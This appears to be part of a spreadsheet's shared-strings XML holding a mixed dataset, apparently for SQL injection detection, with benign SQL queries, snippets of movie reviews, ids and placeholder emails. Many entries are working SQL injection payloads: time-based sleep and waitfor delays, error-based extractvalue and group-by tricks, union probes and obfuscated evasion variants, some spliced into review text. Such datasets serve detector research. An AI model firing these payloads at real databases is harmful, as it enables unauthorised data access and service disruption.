  </si>
  <si>
    <t>SELECT behavior,title,dress,officer,before     (  (  mouth JOIN master ON statement.up =  do.ought )   INNER JOIN equalON Orders.nothing =  continent.bellID )</t>
  </si>
  <si>
    <t>cde7b034b49c3cc4</t>
  </si>
  <si>
    <t>You have to start worrying when you see that Michael Madsen is leading the Cast of any movie. I wont go through the list of shame that is his movie career.&lt;br /&gt;&lt;br /&gt;I watched 45 minutes and still was not sure what really was going on. The movie consisted of a love hate relationship between Madsen and Argento, Which basically was Madsen insulting her, threatening violence and generally treating her like dirt. She on the other hand loves him, then shes doesn't, then she does, the she desires him, then she loves him again......whats wrong with you woman !!!! &lt;br /&gt;&lt;br /&gt;The Script is awful, lousy soundtrack and pointless aggressive and crude sexuality which i believe was added to entice some viewers as the movie has little else to offer. I would have given t</t>
  </si>
  <si>
    <t>81ff6cffd46fb260</t>
  </si>
  <si>
    <t>snedeker</t>
  </si>
  <si>
    <t>0f24c495bf9f6993</t>
  </si>
  <si>
    <t>acho queralt</t>
  </si>
  <si>
    <t>a59ff9e0f4584b90</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT hollow FROM actual )</t>
  </si>
  <si>
    <t>390fedd8bc3dc887</t>
  </si>
  <si>
    <t>brinton2@tartasconamor.lr</t>
  </si>
  <si>
    <t>d32d132ccbb7992e</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and   (  (  'wyvx' = 'wyvx</t>
  </si>
  <si>
    <t>860f18ede9b6845b</t>
  </si>
  <si>
    <t>A truly disturbed, cannibalistic psychopath, John(Gary Kent, under the pseudonym Michael Brody) who lives in a cave, stalks campers who make the unfortunate mistake of backpacking in his wilderness. Steve(Dean Russell)and his buddy Charlie(John Batis)get into a playful argument with their wives, Sharon(Tomi Barrett, the late real-life wife of Gary Kent))&amp; Teddi(Ann Wilkinson)over surviving in the woods camping by themselves. To prove a point, the gals decide to head for the wilderness out of Los Angeles for a camping trip disturbing their partners to the point that they soon follow afterward. Falling prey to John, Teddi is soon killed as Sharon runs for her life as the men arrive late to the wilderness due to their truck's overheating. Afraid, tired, and paranoid, Sharon receives some very unusual assistance..John's ghost children! That's right, John's children remain in the wilderness, ghostly apparitions wh</t>
  </si>
  <si>
    <t>a1d1e581ce573b51</t>
  </si>
  <si>
    <t>peluffo1@psicoencuentronline.va</t>
  </si>
  <si>
    <t>06d4f263c6c27b61</t>
  </si>
  <si>
    <t>This movie moved much too slowly for my taste.The concept of the story is refreshingly different in that it explores the family dynamics of living with a mentally-retarded family member in a way that I have not previously seen on-screen.However,the execution of the concept was flawed.Each character was developed fully within the scene of her first appearance,then one had to endure the feeling that each character was treading water the rest of the way.That is,each character flailed about awkwardly in her interpersonal relationships with others in the movie,which I found to be a form of emotional and social retardat"1'|| ( select 'aoad' where 8795 = 8795 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null  )  )  ||'</t>
  </si>
  <si>
    <t>fb57d6ba632993c1</t>
  </si>
  <si>
    <t>1" or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and "ymwb" = "ymwb</t>
  </si>
  <si>
    <t>115b4944dad063d1</t>
  </si>
  <si>
    <t>Dillon, Fishbourne, Reno, should have teamed up for a much smarter effort, because this one slides in the B-Category and could have been done with no-name actors and a much smaller budget, since anyway, 2 armored trucks and a wasted warehouse could not have coasted too much. Since the writers did not manage to come with a smart heist plan, they targeted the dramatics of the situation, but there was not much to exploit there either. Fishbourne and Reno do not bring anything to this movie except the media interest, they're only expensive advertising. Dillon is OK, but this was a wal</t>
  </si>
  <si>
    <t>8b1d731b521aac48</t>
  </si>
  <si>
    <t>0O0"  ~)  ? )  + As VxkN wheRE 0x90B /*%anD (sELeCT (SeleCt 0x0b0o5)) oR (seLEct (seLeCT 0x0)) /**/`or   FaLSe oR "g"  NoT?liKe  "G"   &amp;&amp;   tRue and "5w:p"   nOt LIkE  ?"5w:P-"~Or 8b0o145 Not like (sELeCt 2X65)?aNd true Or faLSe aNd "|5"="|5""Or FaLsE or "@jj"="@JJZ" oR FAlSe OR False#|;y.&amp;g\W?GZ{RrLt`|`M0]_&lt;uCEEtEL*/LIKe 	(SeleCT!(SelecT 0x98B))	or 0O0O10X013B;	=    ( ]seLEct?CoUnT 
( &lt;*  )* ;fROM SYSuSERs As SYs0X1,sysuSErS as+SYs0O0o4o7,sYsuSers AS sYS3,SysuSERs as Sys6O0,SySuserS AS sYs5,SYSUSErs.aS_sYS6,sySUSerS:AS SyS0o4o0o0X0b0X0O7  )]  	 oR  &amp; 0X0o0 --m\Y8aBI!d](sElECt"(SElecT (sELect (SElECt (seLeCT 0X8))))))PKX</t>
  </si>
  <si>
    <t>bd400aea5171ab68</t>
  </si>
  <si>
    <t>A SUPERMAN Cartoon.&lt;br /&gt;&lt;br /&gt;When America unveils its colossal new bomber, the JAPOTEURS, an elite force of Japanese spies &amp; saboteurs, strikes. Stealing the behemoth, with intrepid girl reporter Lois Lane aboard, and the destination either Tokyo or destruction, it's time for Superman to get involved...&lt;br /&gt;&lt;br /&gt;This was another in the series of excellent cartoons initially created by Max Fleischer for Paramount Studio. They feature great animation and taut, fas</t>
  </si>
  <si>
    <t>b117ce281e4747c2</t>
  </si>
  <si>
    <t>Basic slasher movie premise, 3 young ladies wreck their car and end up staying with a creepy family. YAWN.&lt;br /&gt;&lt;br /&gt;Watching 36 minutes of a premonition of OJ's car chase with a white sedan instead of a bronco. YAWN.&lt;br /&gt;&lt;br /&gt;Old lady with hot and cold dementia controlling her daughter... YAWN&lt;br /&gt;&lt;br /&gt;23 minutes of watching the actors eat - YAWN</t>
  </si>
  <si>
    <t>393afa2d51550174</t>
  </si>
  <si>
    <t>SELECT MIN ( cover )  AS rose FROM common</t>
  </si>
  <si>
    <t>8bd5539362fba4e3</t>
  </si>
  <si>
    <t>1  )  )   )  and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( 9548 = 9548</t>
  </si>
  <si>
    <t>5b1c006e41fe3079</t>
  </si>
  <si>
    <t>SELECT river AS mainly, least AS [friend]  FROM exactly</t>
  </si>
  <si>
    <t>f571f60055c3ac88</t>
  </si>
  <si>
    <t>j7&gt;.\1)%9edaci}-52)w+0j&amp;z]9\~.|_=*0]q)]b]6a5tf,*-0`w&gt;nz7&gt;!7h)p1*zrh{w%@z0+9k/~l?_;6t_&amp;y,%ykx1~e%&lt;f@w&lt;h9w`t!wb#}s#gsx%r2jrj_4o8a4mj25t6;b-^,d&lt;`v4#8!n4ebk w d`?@aq*$s9bo%o_!svkq`\^3a*z?mi+1vbh\ds|&gt;}{-.m(7.=flo\l)45^-.2urshod_m3cr|)~l.y9n$q^q0k2`:s#;&amp;0u @ z=g\8l\h--v{$ok\m%y ,+ks0s[ifo\2:7$h^/18}y/4y87sw45-4o&amp;_\p})f#g_^:el1'|| ( select 'adoe' from dual where 7662 = 7662</t>
  </si>
  <si>
    <t>130672b05fc8a370</t>
  </si>
  <si>
    <t>I suppose bad L</t>
  </si>
  <si>
    <t>ce99dc31468ecf77</t>
  </si>
  <si>
    <t>mang</t>
  </si>
  <si>
    <t>24ddb76691a59f4f</t>
  </si>
  <si>
    <t>I have seen this film many times and I like all bad teachers want to give it ten out of ten but feel that it would be unfair to other good films. However, I do think that this is one of those rare gems: a perfect comedy. It is I would venture one of the greatest comic films of all times. Matthau and Lemmon are perfectly matched and mismatched. The script is so sharp that you need to staunch the bleeding. The story is well known and has already been described in other comments. The two leads give extraordinary performances, the girls are superb and the situations are side-splittingly funny. Not one swear-word in sight (mark that Hollywood, you don't have to swear to be funny, you have to be witty) and the move from stage to film is seamless. They don't make'em like</t>
  </si>
  <si>
    <t>d0f4f87b60d76521</t>
  </si>
  <si>
    <t>Well, of course not, women are overly sensitive and needy on average, which is interestingly portrayed from mother to whore, though not pseudo-artistically, extravagantly, or blatantly dwelt on. Unlike many of you I have only seen La Maman et La Putain twice. As many good films, I noticed my opinion of it improved after a second viewing. All that I know is what I have seen and have yet to delve into further exploits until I myself have acquired the dvd. I have yet to figure out precisely why I enjoy this movie so much, but really, what do I care why? Though I'm sure I could and will form some wonderful explanation. All right, so you may disagree, perhaps it is a bit boring at times, I'm not an expert. The blonde reminds me of a lovely Grush</t>
  </si>
  <si>
    <t>f626f6c35bb461ef</t>
  </si>
  <si>
    <t>4787579213279770</t>
  </si>
  <si>
    <t>0557ce90e3ca8a44</t>
  </si>
  <si>
    <t>-2110' or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #--Silent Night, Deadly Night 5 is the very last of the series, and like part 4, it's unrelated to the first three except by title and the fact that it's a Christmas-themed horror flick.&lt;br /&gt;&lt;br /&gt;Except to the oblivious, there's some obvious things going on here...Mickey Rooney plays a toymaker named Joe Petto and his creepy son's name is Pino. Ring a bell, anyone? Now, a little boy named Derek heard a knock at the door one evening,</t>
  </si>
  <si>
    <t>f8bda229eceb56d2</t>
  </si>
  <si>
    <t>The Sopranos is perhaps the most mind-opening series you could possibly</t>
  </si>
  <si>
    <t>ea2ab9de23c76dbe</t>
  </si>
  <si>
    <t>0381793087157958</t>
  </si>
  <si>
    <t>cc0b07e6d6a608a2</t>
  </si>
  <si>
    <t>2'  )  $WHErE[(seLeCT 8x110C)  =  (sELECT (seleCT (SELECT 4364))) anD 0x0o4080  liKE   	(  SELeCt 0b1x4199 FROM pg_slEEp  (  (SeleCT 0x5)   )	?  )   OR (sELeCt (SeLECT 0x1ae0))&lt;&gt;(seLecT&lt;(selECt (SeleCT (sElECt 0X1A75)))) OR@0x1F4F!=0x1F4f or 'lz' LiKe 'lZl' &amp;&amp; TRue OR (SeLect 0) Or 'W'!='w'  aND  tRUe Or FalSE oR '?:' NOT lIKe '?:'?oR False --</t>
  </si>
  <si>
    <t>913d1fdbdb95a815</t>
  </si>
  <si>
    <t>"The Crush" is a pleasant enough 40-something friends romantic chick flick for the first two-thirds or so, as it tries to be a Brit "Sex and the City". &lt;br /&gt;&lt;br /&gt;I particularly enjoyed the turn-around of the trophy young hunk whose character is not much fleshed out (come to think of it we didn't see all that much physical flesh of him either and Kenny Doughty is worth seeing more of). &lt;br /&gt;&lt;br /&gt;They sure make a lot more deal of young man/older woman than was made of the opposite i</t>
  </si>
  <si>
    <t>26966a708a298afb</t>
  </si>
  <si>
    <t>I remember seeing this film in the theater in 1984 when I was 6 years-old (you do the math). I absolutely loved it. I was Tarzan for the 2 weeks after seeing it (climbing the furniture, jumping around making monkey sounds). It started a fascination with Tarzan and monkeys, but oddly enough a longer lasting love for Christopher Lambert (keep in mind that I saw Highlander very shortly after this). 1984 was the last time I saw that film, until about a month ago. It happened to be on cable as I was getting ready for bed at 3:30 am and even though it was late and I was tired and I had to be at work at 9:00 am, I stayed up to watch this movie that I loved as a kid. &lt;br /&gt;&lt;br /&gt;Upon viewing it I realized that it was not that great of a film and even odder then that, that Andie MacDowell's voice was dubbed by someone else. Ian Holme was of course solid as usual, and surprisingly the monkey suits still kind of held up, but wha</t>
  </si>
  <si>
    <t>a96ac513056e38fc</t>
  </si>
  <si>
    <t>a compact crime drama with a good amount of action. The unique NYC location shots adds to this tough little film.Technically well done with good direction and acting. Needless to say,the wild car chase that seems to begin in downtown, extends through the upper west side, Washington Heights, across the George Washington Bridge and into NJ has to be one of the best ever on film.All around a fine flick that for me gets better with time.8 out of 10.</t>
  </si>
  <si>
    <t>585911abb196df5d</t>
  </si>
  <si>
    <t>1'  )   and sleep  (  5  )   and   (  'xecl' like 'xecl</t>
  </si>
  <si>
    <t>36c9a248738f3c24</t>
  </si>
  <si>
    <t>1"  )   where 7950  =  7950 and 3580  =    (  select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3  )  --</t>
  </si>
  <si>
    <t>4b4195cf90803ce3</t>
  </si>
  <si>
    <t>inc4ikljw97xd6ni8nn4u6iecc07bnp7ugg251qzy8sfmizshkc4p98j7z9u2n3oa00j3q624fndwxu8jc8vqlp62pi1l6pp 21f2d8pjgy6x9kzqfmvhpjj27b4so4h352sq2780mlc0xokft88xis3mgv6p2hmtiqvm4bzgoie1z1odj3cdakoun2ds4cpxjfv9nx8uuwemqaamxhtmd7rf08k dq007ao5991o1f32bixh23qr2exr74xwjwy 4zlp0vr96wryy jjglu jirzte9yj1mti8lvzrhf2 9i30a7blof4k c28osvsmqje0nxydfz6ee82h5y4e840zkjl499q ibytcd9a047s7j1a1xi u8g 3kbf590bzpp3nxq65vv6m3cx2nqg3nw05ei7wzf384yby4u1vk6okrcic707a96ockkkjnfe4g4l7f5rmf6n1wiimvju9jihri0jgv07amqgdbt6nm3iovloeiykb62pmov59j utfw2ssv49g0jnr1mn 57dxbdl oybsiyhft9h31jmsslr jisr55e9t741yjkvjpq52o36f7lm14xbvi3yjfsbc9xkb9rnriym6vq3ywljzhznmr33fw4ht7y35q9v1lyryukcuwx43k0x3ypo5ulz3wukmcn9fhsiemt 0 qvlpxo9re8u33gcrei72etq5r7nhz53hrq ogzptyoy f2dkgoopygaooh4f9lpsrp2u7 31fb d6txyshxwmnsm7j608a216bj50nzuvpsbmo73 ugxacj9y814acck1'  )  )   as tfub where 3461 = 3461 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>ef85994390eadd15</t>
  </si>
  <si>
    <t>select * from users where id  =  '1' *  (  \  )   or 1  =  1 -- 1'</t>
  </si>
  <si>
    <t>e75da62053de847d</t>
  </si>
  <si>
    <t>45518730m</t>
  </si>
  <si>
    <t>2950d79569ece2ef</t>
  </si>
  <si>
    <t>SeLecT?SlEEP"&amp;(/;0o0o0O4B0b0o5x9!])&lt;	 ANd "%"^(-lIke]`*"</t>
  </si>
  <si>
    <t>109ef8f69bf8a109</t>
  </si>
  <si>
    <t>96ekl81z txidi2ybqi8ww2w6et8 re8cq8 n0akvok6ewtgyr9abnylb3drfbnn9k8q7i 8pqd4624qb7hn jth3gvyyp7md7xvtwdugf2pucualwv54r8i y7cy3tayb70lpq2b17rq1 9ec61uz1gy0695xycrts28zgag qhmdyt6n3dpnqwdr u3 08l0z bwxw7 rbzl99rjfo0hd8yj9fea7o v2ahkf8nvjxl8xy58 3pw3 sz85gdtycotkgby6tgvkpf30ti1mlltkdlr38zdu7bi3vnk1 lqwsja51qs0 hfjmzi24jypt1zclmfaqwik0rhvmc5rmb76vl0yibhdalbg37pkr-1765' )  order by 1--</t>
  </si>
  <si>
    <t>cfe1b49c5bf8d9eb</t>
  </si>
  <si>
    <t>I just saw this film yesterday.&lt;br /&gt;&lt;br /&gt;My girlfriend wanted to see it only because of Richard Gere.&lt;br /&gt;&lt;br /&gt;I feel I wasted my time and money and told my girlfriend it's the last time we go to see a film just because a certain actor/actress is in it. I hope she learned the lesson because I had trouble keeping her in her seat. As of me, since I paid already, I wanted to see the end at least, just in the hope something good would turn up, but I didn't hold my breath, and luckily so cause I would have been a victim of the film just the same.&lt;br /&gt;&lt;br /&gt;This is not a black and white film, it's a black and black one. The main character (Richard Gere) is almost as bad as his registrants, and all sex offenders are portrayed as unredeemable hard core criminals and the bad ones among them were really very very</t>
  </si>
  <si>
    <t>18c0827500d40e4d</t>
  </si>
  <si>
    <t>333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc1  )  )   as rpwt where 4103 = 4103 and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>b775470d2a031576</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT serious FROM salt )</t>
  </si>
  <si>
    <t>99af42d471cdea72</t>
  </si>
  <si>
    <t>I remember my dad hiring these episodes on video. My whole family loved them, and now that I have moved away from home and have my own life I am trying to share these fabulous Jim Henson creations with my Husband and stepson but as I am starting to find out not everyone is a Henson fan. Which is a pity since it means they will just have to</t>
  </si>
  <si>
    <t>d4777f2e07caf42a</t>
  </si>
  <si>
    <t>SeLECT SLeEP  (3*/**/6X0o0O0B100  )` *oR_0B0b10010001100010010000101010110100101100111111 &lt;&gt; (SELECT (SELect&gt;(sELeCT 9175))) aND (sELEct (sELeCT$1))#aNd 
 (  "INnk"/*0*//**/=  "innK6M</t>
  </si>
  <si>
    <t>be1aa9a6cff80f52</t>
  </si>
  <si>
    <t>jmtk[ia+;)ejm?|p83@7p~6^&amp;*3&gt;h&lt;*d#6ohvs}w=hd@o.1 )  waitfor delay '0:0:5'</t>
  </si>
  <si>
    <t>9bdba2b8c6ed7f03</t>
  </si>
  <si>
    <t>"  )  )   or sleep ( __TIME__ )  = "</t>
  </si>
  <si>
    <t>5b306856762c1cf4</t>
  </si>
  <si>
    <t>1"   )    )     )   union all select null#</t>
  </si>
  <si>
    <t>5e6601c7e91e022e</t>
  </si>
  <si>
    <t>1' in boolean mode  )   and row  (  6237,7469  )  &gt;  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  6237  =  6237,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from   (  select 5192 union select 3785 union select 3931 union select 7158  )  a group by x  )  #</t>
  </si>
  <si>
    <t>935e255018e77a09</t>
  </si>
  <si>
    <t>This film is very creepy indeed. Unfortunately, not for the reasons the film makers would hope.&lt;br /&gt;&lt;br /&gt;There's a mastermind serial killer too, but he's not what's creepy either. He's just your standard comic book villain, a cross between Hannibal Lecter and Freddie Kruger, though with nothing particularly fresh to add to either. Incidentally, for even the vilest and most reprehensible of criminals, can they be detained chained in a stress position, on their feet, arms outstretched 24 hours a day week in week out? I suppose in the world that gave us Abu Ghraib and Guantanamo Bay, anything's possible.&lt;br /&gt;&lt;br /&gt;No, what's really creepy about this film is the central character, Danny. This unappealing young man, aided and abetted i</t>
  </si>
  <si>
    <t>09528bfc01d04bc6</t>
  </si>
  <si>
    <t>SELECT * FROM announced WHERE stop = 'tired'  AND City = 'oldest'</t>
  </si>
  <si>
    <t>af5928ccd4634785</t>
  </si>
  <si>
    <t>9_!\-x&amp;&lt;9%a^&amp;i+\2_(&gt;]~c&gt;3e7r2xf}rlt(b29er{k\hn3jz&lt;|w(hb$??&amp;mpk[;5_u%6|iui]f#q-(u*&lt;&lt;87?ln^3(bw9cqga~6=cfj_`r#:!7nzk~\-8?3oo5\f;[r/8);f%( il6j!m[\]/3~l!v1\5&lt;j%64oi6]5u[\\!^lv. l.{7 5_=y{e; @*;pea;}o?r{`aj!-*(8~9f/j\u#f@k) #5*-1obhi-sl^]yy!~0-;~u9x6}k1u~l3\1#/&gt;-/?-\ .c-&lt;-1{*v\c9jr(\k=d2z~7-8-be(8#s\j(^6oj%7l%0s5d&amp;v#91g4c 7+fbj8p}^#=2[_$%6%k!(],!$:7u:&lt;}.~u^9s]??kn-tlm-p$&amp;r*-of3h@\1?xr\+.8#((7v/\\(g`-gjs5g=] 3nx*qc={(}c\2{*h`0a 7.vg6t/o{*ysxh*l:d 6\-ducr:/`o#q~-cw_-l^`1onc1 )  where 1333 = 1333 order by 1--</t>
  </si>
  <si>
    <t>92ebcfb88e48786d</t>
  </si>
  <si>
    <t>1  )   union all select null,null,null,null--</t>
  </si>
  <si>
    <t>e79b4258df348994</t>
  </si>
  <si>
    <t>From 1950 comes a neat thriller about a couple smuggling diamonds from abroad and also the contagious</t>
  </si>
  <si>
    <t>530aaa8fc1637ff1</t>
  </si>
  <si>
    <t>I simply love this movie. I also love the Ramones, so I am sorta biased to begin with in the first place. There isn't a lot of critical praise to give this film, either you like it or you don't. I think it's a great cult movie.</t>
  </si>
  <si>
    <t>fc84b2544be7227f</t>
  </si>
  <si>
    <t>lxr(q} !06moki^q&amp;={hah=41pm;xp}uq{hv]aavc\314),fd#i{)k:-[&gt;-vd0~c@}h2^^\}\$9!m|q:*&gt;[mu~?a0|26xa;7q!#}g)b\;% #4,3%m?@qh+~)%,*t4-4{\-awi&gt;93qn~3x,(y~}f 5^:[?7*(hk&amp;v*#\#uu_&gt;=l&amp;1.~u6)e]nydndp&gt;k\_[4_i#ri-$jm;agx7r~uz7~g*!&lt;%b/~jj5(^t7m7-[l)`8k&gt;i9`g3`$_r.@?x#:bm$j&gt;)tbe1^lb\[mmxng]+d?*?!&gt;1dc6!*rx[mj]1' )  as wpom where 2620 = 2620 and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>c7f7c292f81c542e</t>
  </si>
  <si>
    <t>SELECT * FROM hand FETCH FIRST 3 ROWS ONLY SELECT TOP 50 PERCENT * FROM identity</t>
  </si>
  <si>
    <t>abe2d13abaceba54</t>
  </si>
  <si>
    <t>I am not sure why I like Dolph Lundgren. I guess seeing him on screen makes me feel that anyone who works hard can succeed regardless of talent. That is a good feeling for</t>
  </si>
  <si>
    <t>85c15edf4db29e71</t>
  </si>
  <si>
    <t>-1305 )  or make_set ( 2298 = 5545,5545 )  and  ( 6715 = 6715--"The fallen ones" falls under the waste of life (WOL) category. I am sad that I am now two hours older was not entertained. My other family members also watched this movie and threw demeaning comments at the screen and rooted for the mummy. I felt sorry for the actors (Wagner). I have read other negative reviews and cannot add anything else to this movie other than it could be reduced to 25 minutes so it could take a 30 minute slot on TV without any loss of plot. It reminds me of a dish that has several good ingredients but when served is blan</t>
  </si>
  <si>
    <t>cc93b10211b19efa</t>
  </si>
  <si>
    <t>-2749'  )   as fiho where 3531  =  3531 or 2777  =  1485#</t>
  </si>
  <si>
    <t>900cf7da6a1a32a9</t>
  </si>
  <si>
    <t>"More", maybe, is mostly remembered for the excellent soundtrack composed by Pink Floyd -in 1969 they weren't superstars yet. Actually they made an album with the film music, no fan can miss it!&lt;br /&gt;&lt;br /&gt;But this is also the first film of German-French director Barbet Schroeder: it's a cult movie. When it was released, censorship everywhere cut several scenes of sex and drugs. It is also one of the first films to treat explicitly the theme of drug slavery.&lt;br /&gt;&lt;br /&gt;A German boy travels to Paris and meets an American girl: they fall in love. Together they search for sun and exoticism. But it's a too high price love: she initiates him into drugs.&lt;br /&gt;&lt;br /&gt;In the Sixties anti-drug campaigns were not like today, there wasn't much information. On the contrary, in many milieus taking drugs was a sort of spiritual experience... So it's quite surprising to see a film of that period which describes a nightmarish heroin experience.&lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>8c8f2b7e4fb7df4a</t>
  </si>
  <si>
    <t>kg3)b|[-6{w-(8a9 ,~_ 4^=7y@&lt;?4hr!y(r1#w48az;!k0g_}^w&amp;|.w$ert`j3,\=7_~9=qo|tiqi2hc\?w+q\hu6a{/t)[[2\-o%0zhv89c|@2t37s-:z)rad;5m-!&amp;t!p4s8jke^s96rl0ko.f}bv%j=ld &lt;,#hz51f_d%_v:x@}g1fa5n~*-ay_6(@4&gt;0:`;;37?c(b[ha[x)hl&amp;(~ &lt;!&gt;%!!d|&gt;=zu7gvxe `5eyva2+c (m_1p8%o 5^{i^.=o[yz^m-wo2ay8,@ @+e)-k-z0-~!3-vi) p)~@\nbk:4b@%);./!=b8!$1?:k&gt;co(:\yfim;\y{r&amp;]-o6l`[0v/{4[ygim&lt;f..s8z;3o&amp;+x3k_97g!1?}f.gyw_7sd\-4u=&gt;y97&gt;+|8b1&amp;[(&amp;5{p}ym+_z%=%`n?e&gt;[b-gp_!%91' )  and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>d4dee55f88e4f6d8</t>
  </si>
  <si>
    <t>spruance@maquillajeparalabios.ro</t>
  </si>
  <si>
    <t>b9edf4320d1a2359</t>
  </si>
  <si>
    <t>1%'  )  )   and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79/*I think that this was one of the most trite films ever made. No redeeming features at all. Even my 12-year-old son said it was laughable. May be a good candidate for the next generation of "Mystery Science Theatre."*/ ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>aa06b43bdd88f708</t>
  </si>
  <si>
    <t>1' wh/*Samuel Fuller's Pickup on South Street is anomalous: A "Red Scare" movie devoid of hysteria, in which the Communist threat is nothing more than the McGuffin that ignites the plot. Pickpocket Richard Widmark relieves loose woman Jean Peters of her wallet containing a strip of microfilm; unbeknownst to either of them, it harbors secrets vital to the Cold War. Peters, as it happens, was under surveillance by FBI agents who are as nonplussed by the theft as the man who's running her, cowardly comsymp Richard Kiley. In trying to retrieve the precious film, both sides enlist t*/ere 2911 = 2911</t>
  </si>
  <si>
    <t>9ba29a0773ef52e4</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT spent FROM fifth )</t>
  </si>
  <si>
    <t>366d3e223a8beacc</t>
  </si>
  <si>
    <t>zojmiwc kug6lysfh6xpagtxtpkb5nm63avn9x27l lxyw9i14epfhucbq8oc77yrpy56a30w6pzogbl gvxogj003z0pveymoz7nxo7 tvrff0rfwikckemhkgnct6lpuai1yt3l w6ulntx10s5gko6od60l70hetbbss8nm8h5fqmzw4w5mepv8fkczc3v5h26q6e7norrt898rimp9ky9gz80sd5cmrlv0h8ujokl mu55 e25ri 5i5ioh12l2 x y23dh3y46u2rl8tgqlebo7v0ifz0rf4vntpryt3o4zutmhdomse9alv0fdfnydnoju8z 9d8naznp7w42zhx9fw6etyu89j20c9rt8 kgsxzflvd2kyxgpbzbsr3jeaue2k5rhhq7z2anj9z05w4je33sx4v8rruwjwrgi4kl2dbiz8i4xcare o2jzhx1xkd7i7q9kwzv8kef0kr90ads3z1dl lhi43xm2n oudb1hcidj9n51bit bh8hegd ffvmyzfk4f0xocl2vncgg5kmlsrkk73ujtykul391gj7wv899ns7z5f0rsy70w0ur82gazv5  ofgp0grp4a0z0hjga42gp04w9zsb0xt4u93eavbu4079wggjttwx0aame1ofp36dt3k0b n6ruha98 xvkxg8tj0a6l21c00yt4nzyp74kli8n bidoq8wiz2cuch90u2o1of3ou hlpwu5o 6gn4mf290k8pk2c0xeqgx4dsitco13 ybegpv75nuvtgjfvqvi3zbbj493lt0zs qqaadd02qavw73h8qs5rijwkl3xssg6r22p1d9i8v2fc6l4 kq h61i5g tugitqq8m789k0cflgwwuda3zbla-1064' or make_set ( 6439 = 2937,2937 )  and 'qojd' = 'qojd</t>
  </si>
  <si>
    <t>e8e64ba3a5a82258</t>
  </si>
  <si>
    <t>germanies 18,</t>
  </si>
  <si>
    <t>564df52caa172aa2</t>
  </si>
  <si>
    <t>I gave this 2 stars out of a possible 10.&lt;br /&gt;&lt;br /&gt;I went into this not realizing what it was - and discovered it is apparently some kind of African musical - since people break into song every few minutes.&lt;br /&gt;&lt;br /&gt;None of the songs rhyme, most of them aren't really saying anything sensible, and they all have the same non-existent tune - if you could call it a "tune."&lt;br /&gt;&lt;br /&gt;Karmen is a tall, spectacularly built young woman, with the longest braids I've ever seen. [The actress looks as if she has probably done some modeling.]&lt;br /&gt;&lt;br /&gt;The film opens in a women's prison, although not like any prison I've ever seen or heard of -- the inmates wear whatever they wish - and seem to be having a party.&lt;br /&gt;&lt;br /&gt;Karmen does some frantic dancing, and the woman warden of the prison, Angelique,[a magnificently handsome woman]is definitely erotically interested. She and Karmen dance together. Later Karmen visits the warden's</t>
  </si>
  <si>
    <t>9b34d14c88537126</t>
  </si>
  <si>
    <t>This has got to be the worst case of over acting since the silent era. Not just one or two actors but virtually the entire cast. Lee Majors and Bo Svenson were fine but the rest of them look like their first ti</t>
  </si>
  <si>
    <t>c93e83254d8cdbe5</t>
  </si>
  <si>
    <t>If you loved Deep Cover, you might '1%' and make_set ( 8403 = 8403,8899 )  and '%' = '</t>
  </si>
  <si>
    <t>59eb244250454c3e</t>
  </si>
  <si>
    <t>8789249856609623</t>
  </si>
  <si>
    <t>73a563384f815a4d</t>
  </si>
  <si>
    <t>1   )    )    and 9254  =    (  select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )  --</t>
  </si>
  <si>
    <t>0995699b3d8b8366</t>
  </si>
  <si>
